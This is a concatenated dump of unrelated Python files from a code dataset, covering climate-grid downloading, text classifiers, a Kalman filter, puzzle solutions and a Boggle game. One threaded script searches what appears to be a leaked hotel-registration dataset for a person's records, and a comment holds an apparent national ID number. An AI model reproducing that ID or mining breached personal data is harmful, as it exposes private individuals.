model_spec.BASE_SPEC_NAMES:\n spec = ModelSpec.get(name)\n image_data = spec.load_image('tests/files/cat.jpg')\n assert image_data.any()\n","sub_path":"tests/test_model_spec.py","file_name":"test_model_spec.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"252553523","text":"import logging\nimport os\nimport requests\n\nimport netCDF4\nimport numpy\n\n# Logger object\nlog = logging.getLogger(__name__)\n\norca1_grid_shape = (292, 362)\norca025_grid_shape = (1050, 1442)\n\ncached_vertices = {}\n\n\ndef load_vertices_from_file(gridtype, shape):\n global cached_vertices\n gridchar = gridtype\n if shape == orca1_grid_shape:\n mesh = \"ORCA1\"\n elif shape == orca025_grid_shape:\n mesh = \"ORCA025\"\n else:\n log.fatal(\"Unsupported grid resolution for NEMO: %s\" % str(shape))\n return None, None\n if (mesh, gridchar) in cached_vertices.keys():\n return cached_vertices[(mesh, gridchar)][0], cached_vertices[(mesh, gridchar)][1]\n file_name = '-'.join([\"nemo\", \"vertices\", mesh, gridchar, \"grid\"]) + \".nc\"\n fullpath = os.path.join(os.path.dirname(__file__), \"resources\", \"nemo-vertices\", file_name)\n if not os.path.isfile(fullpath):\n if not get_from_b2share(file_name, fullpath):\n log.fatal(\"The file %s could not be downloaded, please install manually at %s\" % (file_name, fullpath))\n return None, None\n nemo_vertices_file_name = os.path.join(\"ece2cmor3/resources/nemo-vertices/\", fullpath)\n nemo_vertices_netcdf_file = netCDF4.Dataset(nemo_vertices_file_name, 'r')\n lon_vertices_raw = numpy.array(nemo_vertices_netcdf_file.variables[\"vertices_longitude\"][...], copy=True)\n lat_vertices = numpy.array(nemo_vertices_netcdf_file.variables[\"vertices_latitude\"][...], copy=True)\n nemo_vertices_netcdf_file.close()\n lon_vertices = numpy.where(lon_vertices_raw < 0, lon_vertices_raw + 360., lon_vertices_raw)\n cached_vertices[(mesh, gridchar)] = (lon_vertices, lat_vertices)\n return lon_vertices, lat_vertices\n\n\ndef get_from_b2share(fname, fullpath):\n site = \"https://b2share.eudat.eu/api\"\n record = \"3ad7d5c5f1ab419297c1e02bded8d70f\"\n resp = requests.get('/'.join([site, \"records\", record]))\n if not resp:\n log.error(\"Problem getting record data from b2share server: %d\" % resp.status_code)\n return False\n d = resp.json()\n for f in d[\"files\"]:\n if f[\"key\"] == fname:\n url = '/'.join([site, \"files\", f[\"bucket\"], f[\"key\"]])\n log.info(\"Downloading file %s from b2share archive...\" % fname)\n fresp = requests.get(url)\n if not fresp:\n log.error(\"Problem getting file %s from b2share server: %d\" % (fname, resp.status_code))\n return False\n with open(fullpath, 'wb') as fd:\n fd.write(fresp.content)\n log.info(\"...success, file %s created\" % fullpath)\n return True\n","sub_path":"ece2cmor3/__load_nemo_vertices__.py","file_name":"__load_nemo_vertices__.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"641389900","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.cluster import KMeans\nimport numpy as np\n\nfrom data import DianPingDataSet\nfrom utils import preprocess_for_ml\n# 直接调用Sklearn中的包 来比较效果\n\n\ndef main():\n # 处理数据\n train_dataset = DianPingDataSet(\"train\")\n test_dataset = DianPingDataSet(\"test\")\n train_labels, train_sents = zip(*train_dataset.pairs)\n test_labels, test_sents = zip(*test_dataset.pairs)\n\n # 将句子分词,这样因为sklearn是根据空格来判断词语之间的界限的\n train_sents = preprocess_for_ml(train_sents)\n test_sents = preprocess_for_ml(test_sents)\n\n # 转换为向量的形式,我们使用词的tf-idf值作为特征\n # 处理中文的时候需要指定token_pattern参数,因为sklearn中默认丢弃长度为1的token\n tfidf = TfidfVectorizer(token_pattern=r\"(?u)\\b\\w+\\b\")\n train_sents_tfidf = tfidf.fit_transform(train_sents)\n test_sents_tfidf = tfidf.transform(test_sents)\n\n # 数据准备好之后,开始进行训练!\n\n # 先尝试一下逻辑斯蒂回归\n lr_clf = LogisticRegression(solver=\"lbfgs\", max_iter=3000)\n lr_clf.fit(train_sents_tfidf, train_labels)\n predicted = lr_clf.predict(test_sents_tfidf)\n acc = np.mean(predicted == np.array(test_labels))\n print(\"Accuracy of LogisticRegression: {:.2f}%\".format(acc * 100))\n\n # 朴素贝叶斯:\n nb_clf = MultinomialNB()\n nb_clf.fit(train_sents_tfidf, train_labels)\n predicted = nb_clf.predict(test_sents_tfidf)\n acc = np.mean(predicted == np.array(test_labels))\n print(\"Accuracy of Naive Bayes: {:.2f}%\".format(acc * 100))\n\n # 支持向量机\n sgd_clf = SGDClassifier(max_iter=1000, tol=1e-3)\n sgd_clf.fit(train_sents_tfidf, train_labels)\n predicted = sgd_clf.predict(test_sents_tfidf)\n acc = np.mean(predicted == np.array(test_labels))\n print(\"Accuracy of SVM: {:.2f}%\".format(acc * 100))\n\n # K近邻\n kn_clf = KNeighborsClassifier()\n kn_clf.fit(train_sents_tfidf, train_labels)\n predicted = kn_clf.predict(test_sents_tfidf)\n acc = np.mean(predicted == np.array(test_labels))\n print(\"Accuracy of KNN: {:.2f}%\".format(acc * 100))\n\n # 随机森林\n rf_clf = RandomForestClassifier(n_estimators=20)\n rf_clf.fit(train_sents_tfidf, train_labels)\n predicted = rf_clf.predict(test_sents_tfidf)\n acc = np.mean(predicted == np.array(test_labels))\n print(\"Accuracy of RandomForest: {:.2f}%\".format(acc * 100))\n\n # K均值 需要运行很久的时间,并且效果不好\n # km_clf = KMeans(n_clusters=2).fit(train_sents_tfidf)\n # predicted = km_clf.predict(test_sents_tfidf)\n # acc = np.mean(predicted == np.array(test_labels))\n # print(\"Accuracy of K means: {:.2f}%\".format(acc * 100))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"sklearn_main.py","file_name":"sklearn_main.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"654405537","text":"from django.contrib import admin\nfrom models import *\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass ProjectAdmin(admin.ModelAdmin):\n list_display = ['image_thumb', 'project', 'description']\n\n def image_thumb(self, obj):\n if obj.preview_image:\n return '' % obj.preview_image\n\n image_thumb.allow_tags = True\n image_thumb.short_description = _('preview image')\n\n\nadmin.site.register(Project, ProjectAdmin)\n\n\nclass PropertyImageInline(admin.TabularInline):\n model = PropertyImage\n extra = 0\n\n\nclass PropertyMapInline(admin.TabularInline):\n model = PropertyMap\n extra = 0\n\n\nclass PropertyAdmin(admin.ModelAdmin):\n inlines = [PropertyImageInline, PropertyMapInline]\n list_display = ['image_thumb', 'property', 'short_description']\n\n def image_thumb(self, obj):\n if obj.images.count():\n return '' % obj.images.first().image\n\n image_thumb.allow_tags = True\n image_thumb.short_description = _('preview image')\n\n\nadmin.site.register(Property, PropertyAdmin)","sub_path":"pages/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"613162305","text":"from __future__ import print_function\nimport numpy as np\nfrom copy import copy\nfrom matplotlib import pyplot as plt\nfrom noiseestimation.playback_sensor import PlaybackSensor\nfrom bicycle_ekf import BicycleEKF\n\n# parameters\nused_taps = 100\nmeasurement_var = 1e-5\nR_proto = np.array([[1, 0],\n [0, 2]])\nsim_var = 1e-3\nnum_samples = 3800\n# num_samples = 11670\ndt = 0.01\n\nQ = 0.01\nvar_steer = Q * 0.005\nvar_acc = Q * 2\n\n\ndef setup():\n sim = PlaybackSensor(\"data/vehicle_state.json\",\n fields=[\"fYawrate\", \"fVx\"],\n control_fields=[\"fStwAng\", \"fAx\"])\n # set up kalman filter\n tracker = BicycleEKF(dt)\n tracker.R = sim_var + measurement_var\n tracker.x = np.array([[0, 0, 1e-3]]).T\n tracker.P = np.eye(3) * 500\n tracker.var_steer = var_steer\n tracker.var_acc = var_acc\n\n return sim, tracker\n\n\ndef filtering(sim, tracker):\n # perform sensor simulation and filtering\n Rs = [R_proto * sim_var] * num_samples\n readings, filtered, residuals, Ps, Fs, Ks = [], [], [], [], [], []\n for R in Rs:\n time, reading = sim.read(R)\n measurement = reading[0:2]\n controls = reading[2:]\n # skip low velocities\n if measurement[1, 0] < 0.05:\n continue\n tracker.predict(controls)\n tracker.update(measurement)\n readings.append(reading)\n filtered.append(copy(tracker.x))\n Ps.append(copy(tracker.P))\n residuals.append(tracker.y)\n Fs.append(tracker.F)\n Ks.append(tracker.K)\n # Debug output for critical Kalman gain\n # if tracker.K[1, 1] > 10:\n # print(tracker.K[1, 1])\n # print(reading[3, 0])\n # print(tracker.P)\n # print(tracker.F)\n # print(\"-\" * 15)\n\n readings = np.asarray(readings)\n filtered = np.asarray(filtered)\n residuals = np.asarray(residuals)\n Ps = np.asarray(Ps)\n Fs = np.asarray(Fs)\n Ks = np.asarray(Ks)\n return readings, filtered, residuals, Ps, Fs, Ks\n\n\ndef plot_results(readings, filtered, residuals, Ps):\n # plot_filtered_values(readings, filtered, Ps)\n plot_residuals(readings, filtered, residuals)\n # plot_position(readings, filtered)\n\n\ndef plot_residuals(readings, filtered, residuals):\n zoom_start = 500\n zoom_end = zoom_start + 300\n\n f, axarr = plt.subplots(2, 1, sharex=True)\n axarr[0].set_title(\"Gierrate\")\n axarr[0].plot(\n readings[:, 0] * 180.0 / np.pi,\n 'kx'\n )\n axarr[0].plot(\n filtered[:, 1, 0] * 180.0 / np.pi,\n 'r-')\n axarr[0].set_ylabel(r\"$\\dot{\\psi}$ (deg/s)\")\n axarr[0].set_xlim((zoom_start, zoom_end))\n upper_lim = np.max(filtered[zoom_start:zoom_end, 1, 0]) * 1.2 * 180.0 / np.pi\n lower_lim = np.min(filtered[zoom_start:zoom_end, 1, 0]) * 1.2 * 180.0 / np.pi\n axarr[0].set_ylim((lower_lim, upper_lim))\n\n mean = np.average(residuals[zoom_start:zoom_end, 0, 0])\n axarr[1].set_title(\"Innovation der Gierrate\")\n axarr[1].set_ylabel(r\"$\\Delta\\dot{\\psi}$ (deg/s)\")\n axarr[1].plot([zoom_start, zoom_end], [0, 0], label=\"zero\")\n axarr[1].plot([zoom_start, zoom_end], [mean, mean], label=\"mean\")\n axarr[1].plot(residuals[:, 0, 0], 'o', ms=3, label=\"innovation\")\n axarr[1].set_xlim((zoom_start, zoom_end))\n upper_lim = np.max(residuals[zoom_start:zoom_end, 0, 0]) * 1.2\n lower_lim = np.min(residuals[zoom_start:zoom_end, 0, 0]) * 1.2\n axarr[1].set_ylim((lower_lim, upper_lim))\n axarr[1].set_xlabel(\"Sample\")\n axarr[1].legend(loc=\"lower right\")\n\n plt.show()\n\n\ndef plot_filtered_values(readings, filtered, Ps):\n f, axarr = plt.subplots(3, 1, sharex=True)\n axarr[0].set_title(\"Schwimmwinkel\")\n axarr[0].plot(\n filtered[:, 0] * 180.0 / np.pi,\n 'C2o')\n axarr[0].set_ylim((-10, 
15))\n axarr[0].set_ylabel(r\"$\\beta$ (deg)\")\n # axarr[0, 1].set_title(\"Geschaetze Varianz des Schwimmwinkels\")\n # axarr[0, 1].plot(\n # Ps[:, 0, 0]\n # )\n # axarr[0, 1].set_ylim((0, 0.005))\n\n axarr[1].set_title(\"Gierrate\")\n axarr[1].plot(\n readings[:, 0] * 180.0 / np.pi,\n 'kx'\n )\n axarr[1].plot(\n filtered[:, 1] * 180.0 / np.pi,\n 'r-')\n axarr[1].set_ylabel(r\"$\\dot{\\psi}$ (deg/s)\")\n # axarr[1, 1].set_title(\"Geschaetze Varianz der Gierrate\")\n # axarr[1, 1].plot(\n # Ps[:, 1, 1]\n # )\n\n axarr[2].set_title(\"Geschwindigkeit\")\n axarr[2].plot(readings[:, 1], 'kx')\n axarr[2].plot(filtered[:, 2], 'b-')\n axarr[2].set_xlabel(\"Sample\")\n axarr[2].set_ylabel(r\"$v$ (m/s)\")\n # axarr[2, 1].set_title(\"Geschaetze Varianz der Geschwindigkeit\")\n # axarr[2, 1].plot(\n # Ps[:, 2, 2]\n # )\n\n plt.show()\n\n\ndef plot_position(readings, filtered):\n # skip last value in loops\n yaw_angles = [0] * len(filtered)\n for idx, yawrate in enumerate(filtered[:-1, 1, 0]):\n yaw_angles[idx + 1] = yaw_angles[idx] + dt * yawrate\n\n positions = np.zeros((len(filtered), 2))\n for idx in range(len(filtered) - 1):\n sideslip = filtered[idx, 0, 0]\n angle = yaw_angles[idx] + sideslip\n velocity = filtered[idx, 2, 0]\n delta = dt * velocity * np.array([np.cos(angle),\n np.sin(angle)])\n positions[idx + 1] = positions[idx] + delta\n\n plt.plot(positions[:, 0], positions[:, 1], 'C2-')\n plt.plot(positions[0, 0], positions[0, 1], 'bx', label=\"start\")\n plt.plot(positions[-1, 0], positions[-1, 1], 'rx', label=\"end\")\n plt.legend(loc=\"lower right\")\n plt.xlabel(\"x (m)\")\n plt.ylabel(\"y (m)\")\n plt.show()\n\n\ndef run_tracker():\n sim, tracker = setup()\n readings, filtered, residuals, Ps, Fs, Ks = filtering(sim, tracker)\n\n plot_results(readings, filtered, residuals, Ps)\n\n\nif __name__ == \"__main__\":\n run_tracker()\n","sub_path":"ekf/bicycle/residuals.py","file_name":"residuals.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"524364814","text":"\n\n###################\n#\n#\t\t\tREADME\n#\n#\t\tAn extension to this would be a bash wrapper to the convert to pdf and merge into one file\n#\n#\t\tBlueskies:\n#\n#\t\t\t1) Create a GUI for creating new models and tests\n#\n#\t\t\t2) An executable short cut on desktop\n###################\n\nimport secretary\nimport json\nimport random\nimport sys\nimport inflect\n\n\np = inflect.engine()\n\n\ncopies = int(sys.argv[1])\nnumQuestions = int(sys.argv[2])\n\ndef makeCopy(num):\n dictionary = {}\n f = open(\"./questions/test.json\", \"r\")\n questions = json.load(f)\n f.close()\n \n r = random.sample(list(questions.values()), numQuestions)\n counter = 1\n while len(dictionary) < numQuestions:\n dictionary[str(p.number_to_words((counter)))] = r[int(counter-1)]\n counter += 1\n #print(str(p.number_to_words((counter))))\n #print(dictionary)\n engine = secretary.Renderer()\n result = engine.render(\"/home/rr/Development/AntiCheat_format/models/new.odt\", **dictionary)\n output = open(\"/home/rr/Development/AntiCheat_format/tests/{}.odt\".format(num), 'wb')\n output.write(result)\n\n\n\nfor a in range(0, copies):\n makeCopy(a)\n","sub_path":"scripts/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"213199737","text":"# test inputs\nnum_players = 9\nhighest_marble = 25\n\n# replace string at index\ndef replace_str_index(text,index=0,replacement=''):\n return '%s%s%s'%(text[:index],replacement,text[index+1:])\n\n# circle of marbles\nclass Circle:\n\n def __init__(self):\n self.marbles = [0]\n self.current = 0 # index of current marble\n \n def _index(self, offset):\n return (self.current + offset) % len(self.marbles) + 1\n\n def add(self, marble, offset=1):\n self.current = self._index(offset)\n self.marbles.insert(self.current, marble)\n \n def remove(self, offset=-8):\n self.current = self._index(offset)\n removed = self.marbles[self.current]\n del self.marbles[self.current]\n return removed\n\n def __repr__(self):\n return ' '.join([f\"({m})\" if i == self.current else f\" {m} \" for i, m in enumerate(self.marbles)])\n\ncircle = Circle()\nprint(circle)\nfor m in range(1, highest_marble + 1):\n if m % 23 == 0:\n print(\"not adding\", m)\n removed = circle.remove()\n print(\"removed\", removed)\n else:\n circle.add(m)\n print(circle)\n\ndef play(num_players, highest_marble):\n players = [0 for i in range(num_players)]\n current = 0\n circle = Circle()\n for m in range(1, highest_marble + 1):\n if m % 23 == 0:\n players[current] += m\n removed = circle.remove()\n players[current] += removed\n else:\n circle.add(m)\n current += 1\n if current == len(players):\n current = 0\n return players\n\nplayers = play(num_players, highest_marble)\nprint(players)\nprint(max(players))\n\ngame_players = [10, 13, 17, 21, 30, 452]\ngame_highest_marbles = [1618, 7999, 1104, 6111, 5807, 70784]\nfor num_players, highest_marble in zip(game_players, game_highest_marbles):\n players = play(num_players, highest_marble)\n print(f\"{num_players} players; last marble is worth {highest_marble} points: high score is {max(players)}\")\n\nnum_players = game_players[-1]\nhighest_marble = game_highest_marbles[-1]*10\n\n# seems to be computationally unfeasible!\nprint(\"part 2\")\nplayers = play(num_players, highest_marble)\nprint(f\"{num_players} players; last marble is worth {highest_marble} points: high score is {max(players)}\")\n","sub_path":"python/day09.py","file_name":"day09.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"375104741","text":"import threading\nimport os\n\nclass Find(threading.Thread):\n def __init__(self,kaifanglist,istart,iend,searchstr,savefile):\n threading.Thread.__init__(self)\n self.kaifanglist=kaifanglist #开放数据的内存地址\n self.istart=istart #开始的索引\n self.iend=iend #结束的索引\n self.seachstr=searchstr #需要搜索的数据\n self.savefile=savefile #保存\n def run(self):\n self.findlist=[]\n for i in range(self.istart,self.iend):\n line=self.kaifanglist[i].decode(\"gbk\",\"ignore\") #读取一行\n if line.find(self.seachstr)!=-1:\n print(self.getName(),line,end=\"\") #搜索数据\n self.findlist.append(line) #找到加入列表\n global mutex\n with mutex: #写入\n for line in self.findlist:\n self.savefile.write(line.encode(\"utf-8\"))#写入\n\nmutex=threading.Lock() #创建一个锁\nsavefile=open(\"zhaolin.txt\",\"wb\")\n\npath = \"Z:\\\\F\\\\第一阶段视频\\\\20170424\\\\vedio\\\\大数据相关数据\\\\kaifangX.txt\"\nfile = open(path, \"rb\")\nkaifanglist = file.readlines() # 全部读入内存\nlines=len(kaifanglist)#所有的行数\nsearchstr=input(\"输入要查询的数据\")\nN=10 #开启10个线程\nthreadlist=[]\n# 97 9 0-1000000 1000000-2000000 2000000-3000000\nfor i in range(0,N-1): #0,1,2,3,4,5,6,7,8 数据切割\n mythd= Find(kaifanglist,i*(lines//(N-1)),(i+1)*(lines//(N-1)),searchstr,savefile)\n mythd.start()\n threadlist.append(mythd)\n\n#97 = 97//10*10=90\nmylastthd= Find(kaifanglist,lines//(N-1)*(N-1),lines,searchstr,savefile)\nmylastthd.start()\nthreadlist.append(mylastthd)\n\nfor thd in threadlist:\n thd.join()\n\nprint(\"finish\")\nsavefile.close() #关闭\n\n\n\n\n\n\n\n\n\n\n\n\n'''\npath = \"Z:\\\\F\\\\第一阶段视频\\\\20170424\\\\vedio\\\\大数据相关数据\\\\kaifangX.txt\"\nfile = open(path, \"rb\")\nkaifanglist = file.readlines() # 全部读入内存\nsearchstr=input(\"输入要查询的数据\")\nfinddata=Find(kaifanglist,0,len(kaifanglist),searchstr)\nfinddata.start()\nfinddata.join()\nprint(\"完工\")\n'''\n\n\n\n\n\n\n#路径\n'''\npath=\"Z:\\\\F\\\\第一阶段视频\\\\20170424\\\\vedio\\\\大数据相关数据\\\\kaifangX.txt\"\nfile=open(path,\"rb\")\nkaifanglist=file.readlines() #全部读入内存\nsearchstr=input(\"输入要查询的数据\")\nfor line in kaifanglist:\n line=line.decode(\"gbk\",\"ignore\")\n if line.find(searchstr)!=-1:\n print(line)\n'''\n\n\n#\"440102197103035617\"","sub_path":"process/threading/7多线程检索并保存.py","file_name":"7多线程检索并保存.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"62802095","text":"#! /usr/bin/env python3\n\n#######################################################################\n# #\n# The american-english and british-english dictionary files #\n# were downloaded from the below site: #\n# ---> https://www.karamasoft.com/ultimatespell/dictionary.aspx #\n# #\n#######################################################################\n\nimport sys\nif (not sys.version_info >= (3,)):\n sys.stderr.write(\"Please use Python v3.x!\\n\")\n sys.exit()\n\nimport gameboard\nimport gamesetup\nimport tkinter as tk\nimport string\nfrom pytrie.pytrie import StringTrie as trie\nimport threading\nimport time\nimport queue\nimport random\nimport os\n\n\nclass ThreadController():\n \"\"\"Defines the thread controller for the GUI\"\"\"\n\n def __init__(self, update_func, guess_time):\n \"\"\"Initializes a thread controller\"\"\"\n\n self._update = update_func\n self._time = guess_time\n self._queue_line = queue.Queue()\n self._done_time = 180\n\n self._break_threads = threading.Event()\n self._time_thread = threading.Thread(\n target=self.update_clock, name=\"Game Timer\")\n self._time_ai = threading.Thread(\n target=self.ai_play, name=\"AI Player\")\n\n def update_clock(self):\n while not self._break_threads.wait(timeout=1):\n self._done_time -= 1\n self._queue_line.put((1, self._done_time))\n self._update()\n\n def ai_play(self):\n while not self._break_threads.wait(timeout=self._time):\n self._queue_line.put((2,))\n self._update()\n\n @property\n def curr_queue(self):\n return self._queue_line\n\n @property\n def stop_event(self):\n return self._break_threads\n\n @property\n def done_time(self):\n return self._done_time\n\n def start_timer(self):\n self._time_thread.start()\n\n def start_ai(self):\n self._time_ai.start()\n\n def stop_threads(self):\n self._break_threads.set()\n\n def reset_threads(self):\n self._break_threads.clear()\n\n def destroy_threads(self):\n try:\n if self._time_thread.isAlive():\n self._time_thread.join(timeout=None)\n if self._time_ai.isAlive():\n self._time_ai.join(timeout=None)\n except AttributeError:\n pass\n else:\n self._time_thread = None\n self._time_ai = None\n\n\nclass Boggle(tk.Tk):\n \"\"\"Defines the window display for the Boggle GUI\"\"\"\n\n def __init__(self, master):\n \"\"\"Initializes a new window\"\"\"\n\n super().__init__(master)\n self.wm_title(\"BOGGLE\")\n self.geometry(\"{0}x{1}+{2}+{3}\".format(700, 400, 50, 100))\n self.resizable(0, 0)\n self.configure(background=\"steelblue1\")\n\n self.grid()\n\n self.left = tk.Frame(self, bg=\"steelblue1\", width=200, height=400)\n self.left.grid(row=0, column=0)\n\n self.middle = tk.Frame(self, bg=\"steelblue1\", width=300, height=400)\n self.middle.grid(row=0, column=1)\n\n self.right = tk.Frame(self, bg=\"steelblue1\", width=200, height=400)\n self.right.grid(row=0, column=2)\n\n self.createSubWindow()\n if os.name != \"posix\":\n self.default_dict = \"american-english\"\n else:\n self.default_dict = \"/usr/share/dict/words\"\n self.comp_guess_time = 7\n self.createGameOptions()\n if self.result is False:\n self.destroy()\n else:\n self.protocol(\"WM_DELETE_WINDOW\", self.close_game)\n self.human_player = gameboard.Player()\n self.comp_player = gameboard.Player()\n self.human_score = tk.IntVar()\n self.comp_score = tk.IntVar()\n self.initialize_game()\n\n #################################\n # #\n # GAME INITIALIZATION #\n # #\n #################################\n\n def initialize_game(self):\n self.createGameSetup()\n self.controller = ThreadController(\n 
self.processQueueItems, self.comp_guess_time)\n self.human_score.set(self.human_player.score)\n self.comp_score.set(self.comp_player.score)\n self.time_left = tk.StringVar()\n self.time_left.set(\"{0:02d}:{1:02d}:{2:02d}\".format(\n self.controller.done_time // 3600,\n self.controller.done_time // 60,\n self.controller.done_time % 60))\n self.createWidgets()\n self.running = False\n self.mid_game = True\n self.createGameReady()\n\n #####################################\n # #\n # RUNNING GAME FUNCTIONS #\n # #\n #####################################\n\n def get_random_word(self):\n if len(self.words_on_board) > 1:\n rand_idx = random.choice(range(0, len(self.words_on_board) - 1))\n else:\n rand_idx = 0\n\n ai_guess = self.words_on_board[rand_idx]\n return ai_guess\n\n def get_best_scoring_word(self, word):\n highest_exp = 0\n poss_picks = []\n found = False\n for pair in self.words_on_board:\n if pair[0] == word:\n found = True\n poss_picks.append(pair)\n if pair[1] > highest_exp:\n highest_exp = pair[1]\n if found is False:\n return False\n\n for pick in poss_picks:\n self.words_on_board.remove(pick)\n return highest_exp\n\n def processQueueItems(self):\n while self.controller.curr_queue.qsize():\n try:\n thread = self.controller.curr_queue.get_nowait()\n if len(self.words_on_board) == 0:\n with self.controller.curr_queue.mutex:\n self.controller.curr_queue.queue.clear()\n self.stop_game()\n break\n\n if thread[0] == 1:\n self.time_left.set(\"{0:02d}:{1:02d}:{2:02d}\".format(\n thread[1] // 3600, thread[1] // 60,\n thread[1] % 60))\n if thread[1] == 0:\n self.stop_game()\n break\n else:\n ai_guess = self.get_random_word()\n double_word = self.get_best_scoring_word(ai_guess[0])\n self.board.award_pts(\n ai_guess[0], self.comp_player,\n self.running, double_word)\n self.comp_score.set(self.comp_player.score)\n self.update_guesses(ai_guess[0].upper(), 1)\n self.update_idletasks()\n except queue.Empty:\n pass\n\n def ongoing_game(self):\n self.processQueueItems()\n\n def stop_game(self):\n self.controller.stop_threads()\n self.entry_box.config(state=\"disabled\")\n self.clear_button.configure(\n fg=\"cyan\", bg=\"darkorchid3\", state=\"disabled\")\n for button in self.buttons:\n button[0].configure(state=\"disabled\")\n self.filemenu.entryconfig(1, state=\"normal\")\n self.editmenu.entryconfig(1, state=\"normal\")\n self.editmenu.entryconfig(2, state=\"normal\")\n self.running = False\n self.mid_game = False\n self.createWinnerCircle()\n\n def start_game(self):\n self.deiconify()\n self.entry_box.config(state=\"normal\")\n for button in self.buttons:\n button[0].configure(state=\"normal\")\n self.entry_box.focus_set()\n self.filemenu.entryconfig(1, state=\"disabled\")\n self.editmenu.entryconfig(1, state=\"disabled\")\n self.editmenu.entryconfig(2, state=\"disabled\")\n self.clear_button.configure(\n fg=\"cyan\", bg=\"darkorchid3\", state=\"normal\")\n self.controller.start_timer()\n self.controller.start_ai()\n self.running = True\n self.begin.destroy()\n self.double_word_score = 0\n self.after(1000, self.ongoing_game)\n\n def get_word(self):\n word = self.entry_box.get().lower()\n self.textarea.insert(tk.END, \"\\n\"+word)\n self.entry_box.delete(0, tk.END)\n if len(self.words_on_board) == 0:\n self.stop_game()\n return 0\n\n double_word = self.get_best_scoring_word(word)\n if double_word is not False:\n self.board.award_pts(\n word, self.human_player, self.running, double_word)\n self.human_score.set(self.human_player.score)\n self.update_guesses(word, 2)\n self.reset_buttons()\n\n def 
strip_dictionary(self, filename):\n try:\n with open(filename, 'r') as input_words:\n trie_dictionary = trie()\n for line in input_words:\n line = line.strip()\n if line.isupper() or line.istitle():\n continue\n elif line.isalpha():\n if string.ascii_uppercase.count(line[0]):\n continue\n elif len(line) == 17:\n line = line.lower()\n if line.count(\"qu\"):\n trie_dictionary[line] = 1\n else:\n continue\n elif len(line) < 3 or len(line) > 17:\n continue\n else:\n trie_dictionary[line] = 1\n else:\n continue\n return trie_dictionary\n except FileNotFoundError:\n return False\n\n def get_dictionary(self):\n try:\n if self.path.winfo_exists():\n self.default_dict = self.path.get()\n except AttributeError:\n pass\n self.comp_guess_time = self.options.scale.get()\n filename = self.default_dict\n res = self.strip_dictionary(filename)\n if res is False:\n import tkinter.messagebox as tkmb\n\n def error():\n tkmb.showinfo(\"ERROR\", \"{0} NOT FOUND\".format(filename))\n error()\n self.result = False\n else:\n self.dictionary = res\n self.options.destroy()\n\n def lookup_word(self, word):\n return self.dictionary.get(word, 0)\n\n def update_guesses(self, word, player_no):\n self.guess_entry.config(state=\"normal\")\n if player_no == 1:\n self.guess_entry.configure(fg=\"darkorchid3\")\n self.guess_entry.insert(\"end\", word + '\\n')\n self.guess_entry.configure(fg=\"black\")\n else:\n self.guess_entry.insert(\"end\", word + '\\n')\n self.guess_entry.see(tk.END)\n self.guess_entry.config(state=\"disabled\")\n\n def type_letter(self, pos):\n button_pos = (pos.x_coord * 4) + pos.y_coord\n self.buttons[button_pos][0].configure(bg=\"yellow\")\n self.buttons[button_pos][0].config(state=\"disabled\")\n self.entry_box.insert(\"end\", pos.letter)\n\n def reset_buttons(self):\n self.entry_box.delete(0, tk.END)\n for button in self.buttons:\n if button[1]:\n button[0].configure(bg=\"lavender\", fg=\"red\", state=\"normal\")\n else:\n button[0].configure(\n bg=\"lavender\", fg=\"darkorchid3\", state=\"normal\")\n\n def close_game(self):\n if self.mid_game is True and self.running is True:\n self.running = False\n self.controller.stop_threads()\n self.controller.destroy_threads()\n self.destroy()\n\n def reset_game(self):\n try:\n self.win_circ.destroy()\n except AttributeError:\n pass\n\n try:\n self.begin.destroy()\n except AttributeError:\n pass\n\n try:\n if self.options.winfo_exists():\n self.options.lift(aboveThis=self)\n return 0\n except AttributeError:\n pass\n\n self.withdraw()\n self.human_player.score = 0, self.running\n self.comp_player.score = 0, self.running\n self.controller.reset_threads()\n self.controller.destroy_threads()\n self.guess_box.destroy()\n self.initialize_game()\n\n ###################################\n # #\n # SETUP GAME FUNCTIONS #\n # #\n ###################################\n\n #############################\n # #\n # GAME SUBWINDOWS #\n # #\n #############################\n\n def __CancelCommand(self, event=None):\n pass\n\n def createSubWindow(self):\n self.intro = tk.Toplevel(bg=\"darkslategray1\")\n self.intro.geometry(\"{0}x{1}+{2}+{3}\".format(400, 250, 195, 175))\n self.intro.wm_title(\"BOGGLE INTRO\")\n self.intro.resizable(0, 0)\n self.intro.lift(aboveThis=self)\n self.withdraw()\n self.msg = \"Welcome to the BOGGLE word game! This program simulates \"\\\n \"the 16-dice set version of Boggle distributed by Hasbro \"\\\n \"Gaming. This version has 1 cube with 'Qu' on one of the sides. 
